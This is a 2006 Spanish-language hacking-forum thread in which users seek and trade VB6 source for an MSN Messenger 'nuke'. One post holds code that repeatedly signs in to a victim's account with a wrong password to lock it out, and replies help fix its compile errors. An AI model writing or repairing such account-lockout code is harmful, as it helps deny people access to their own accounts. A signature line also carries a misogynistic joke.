elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  codigo fuente de un nuke para msn
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: codigo fuente de un nuke para msn  (Leído 8,244 veces)
vodka

Desconectado Desconectado

Mensajes: 37


Ver Perfil
codigo fuente de un nuke para msn
« en: 5 Marzo 2006, 22:06 pm »

wenas,hay alguien k tenga el codigo fuente de un nuke para msn,para ver como funciona :rolleyes:


En línea

kontaminator

Desconectado Desconectado

Mensajes: 37


Tuve que cambiar de mail. Agregenme


Ver Perfil WWW
Re: codigo fuente de un nuke para msn
« Respuesta #1 en: 6 Marzo 2006, 15:34 pm »

www.messengeradictos.com

Hay un foro en preguntas frecuentes y explica como hacerlo

espero que sea lo que nece4sitas.


En línea



my_sistemas

Desconectado Desconectado

Mensajes: 65



Ver Perfil WWW
Re: codigo fuente de un nuke para msn
« Respuesta #2 en: 10 Marzo 2006, 23:59 pm »

no lo encuntro porfavro a ver si es q tu sabes lo puedes explicar...
En línea

cuando uno es grande...
la calidad nunca la pierde...
Robokop


Desconectado Desconectado

Mensajes: 1.660



Ver Perfil
Re: codigo fuente de un nuke para msn
« Respuesta #3 en: 11 Marzo 2006, 00:32 am »

yo hice uno hace poco tiempo tenia algunos errores el codigo ya lo habia publicado yo en el foro
http://foro.elhacker.net/index.php/topic,100398.0.html
saludos
PD: Si lo puedes corregir para que funcione bien luego pones el codigo porque a esto de programacion para messeneger no entiendo muy bien
« Última modificación: 11 Marzo 2006, 00:34 am por robokop » En línea

R-Q-X

Desconectado Desconectado

Mensajes: 43



Ver Perfil
Re: codigo fuente de un nuke para msn
« Respuesta #4 en: 11 Marzo 2006, 01:10 am »

Disculpame Robokop pero tu nuker de msn no me anda. Espero q me puedas responder mi error. es q soy nuevo en vb.

Code:
Dim ti As Integer
Public WithEvents MSN As MessengerAPI.MessengerNative<--Error en esta linea
Private Sub Command1_Click()
ti = 0
Dim password As String
Dim usuario As String
password = "hola"
usuario = Text1.Text
MSN.Signin 0, usuario, password
Timer1.Enabled = True
End Sub

Private Sub Form_Load()
Set MSN = New MessengerAPI.MessengerNative
Timer1.Enabled = False
End Sub

Private Sub Timer1_Timer()
ti = ti + 1
If ti >= 20 Then
Timer1.Enabled = False
Else
Dim password As String
Dim usuario As String
password = "hola"
usuario = Text1.Text
SendKeys "{tab}"
SendKeys "{tab}"
SendKeys "{tab}"
SendKeys "{tab}"
SendKeys "{tab}"
SendKeys "{tab}"
SendKeys usuario
SendKeys "{tab}"
SendKeys password
SendKeys "{enter}"
End If
End Sub



El error Me dice no se a definido el tipo x el usuario.
Desde ya e digo grax
Salu2
En línea

Que fue lo mas inteligente que salio de la boca de una mujer?
la p*j* de A.Einstein
yofoxD

Desconectado Desconectado

Mensajes: 169


Ver Perfil
Re: codigo fuente de un nuke para msn
« Respuesta #5 en: 11 Marzo 2006, 02:12 am »

creo que lo paso fue que no lo agregastes la referencia de msn. dale a project/references/ y buscas messenger api type library algo asi y la agregas
En línea

Robokop


Desconectado Desconectado

Mensajes: 1.660



Ver Perfil
Re: codigo fuente de un nuke para msn
« Respuesta #6 en: 11 Marzo 2006, 03:16 am »

yo hice uno hace poco tiempo tenia algunos errores el codigo ya lo habia publicado yo en el foro
http://foro.elhacker.net/index.php/topic,100398.0.html
saludos
PD: Si lo puedes corregir para que funcione bien luego pones el codigo porque a esto de programacion para messeneger no entiendo muy bien
xD si dije que tenia unos errores que no se los eh podido corregir porque no se mucho de visual para msn
En línea

R-Q-X

Desconectado Desconectado

Mensajes: 43



Ver Perfil
Re: codigo fuente de un nuke para msn
« Respuesta #7 en: 11 Marzo 2006, 03:33 am »

RedShots Gracias pero me sige sin andar. Seguro q el problema bien x hay.
Y Robokop Puede ser q tu prog tenga un par de falllos pero a mi ni sikiera me arranca.
Gracias a ambos de todos modos..
Si alguien puede corregir mi error se lo aaradeseria mucho q me lo explike

.......Salu2.......
En línea

Que fue lo mas inteligente que salio de la boca de una mujer?
la p*j* de A.Einstein
The Shredder

Desconectado Desconectado

Mensajes: 251


La guitarra,causa y solucion a todos mis problemas


Ver Perfil WWW
Re: codigo fuente de un nuke para msn
« Respuesta #8 en: 11 Marzo 2006, 18:57 pm »

acaba de decir y repetir que el programa tiene fallos que no ha podido solucionar!!!!!
En línea

pure linux programming...
yofoxD

Desconectado Desconectado

Mensajes: 169


Ver Perfil
Re: codigo fuente de un nuke para msn
« Respuesta #9 en: 12 Marzo 2006, 04:16 am »

para solucionar el error prueba poniendo en la parte de arriba en vez de :
Public WithEvents MSN As MessengerAPI.MessengerNative
por esto:
Public WithEvents MSN As Messenger

y en el form:
Set MSN = New MessengerAPI.MessengerNative
por esto
Set MSN = New Messenger
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
WLAN_AUDIT para Iphone y su codigo fuente
Hacking Mobile
ChimoC 0 6,157 Último mensaje 9 Marzo 2011, 09:50 am
por ChimoC
Intel abre el código fuente de su tecnología 3D para internet
Noticias
wolfbcn 1 1,917 Último mensaje 9 Junio 2011, 07:25 am
por Nakp
OS DEJO UN CODIGO FUENTE ¿ QUE PONGO EN MI WEB PARA QUE SE VEA EL VIDEO?
Dudas Generales
gemagra 1 3,286 Último mensaje 12 Marzo 2012, 18:41 pm
por el-brujo
Código de fuente, modificar para ver respuestas
Dudas Generales
5ant1ag094 1 9,316 Último mensaje 8 Marzo 2013, 23:22 pm
por ‭lipman
Codigo fuente para bloquear el internet
Programación C/C++
crlos20 3 2,560 Último mensaje 28 Enero 2014, 19:23 pm
por x64core
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines